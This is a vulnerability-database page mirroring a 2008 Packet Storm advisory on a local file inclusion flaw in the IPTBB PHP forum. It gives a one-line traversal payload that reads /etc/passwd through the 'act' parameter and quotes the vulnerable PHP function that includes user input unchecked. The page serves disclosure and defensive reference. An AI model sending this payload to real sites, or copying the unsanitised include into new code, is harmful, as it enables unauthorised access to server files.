Lucene search
K

iptbb-lfi.txt

🗓️ 20 Jun 2008 00:00:00Reported by stormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

IPTBB forum system PHP and mysql, Local File Inclusion vulnerabilit

Code
` ____ _ _ _ ___ __ _ __  
/ ___| ___ | \ | |_ _| | \ \ / /__ _ _ _ __ ___ ___| |/ _| ___ _ __ __ _  
| | _ / _ \| \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` |  
| |_| | (_) | |\ | |_| | | | | | (_) | |_| | | \__ \ __/ | _| (_) | | | (_| |  
\____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_| |___/\___|_|_|(_)___/|_| \__, |  
---------------------------------------------------------------------------|___/  
Exploit found by sToRm  
  
IPTBB is a free forum system built using PHP and mysql.  
Local File Inclusion  
  
Local File Inclusion  
--------------------  
  
index.php?act=../../../../../../etc/passwd%00  
  
  
function action($page){  
$page="main/".$page.".php";  
//Include the template maker  
//Get the settings  
$setting = array();  
$sql = mysql_query(" SELECT * FROM `iptbb_settings` ");  
  
while ( $row = mysql_fetch_array( $sql ) ){  
$setting["{$row['name']}"] = $row['value'];  
}  
  
require_once('tpl.class.php');  
$tpl = new template;  
$fileurl = 'templates/';  
$template = $setting['template'] . '/';  
include($page);  
}  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Jun 2008 00:00Current
7.4High risk
Vulners AI Score7.4
21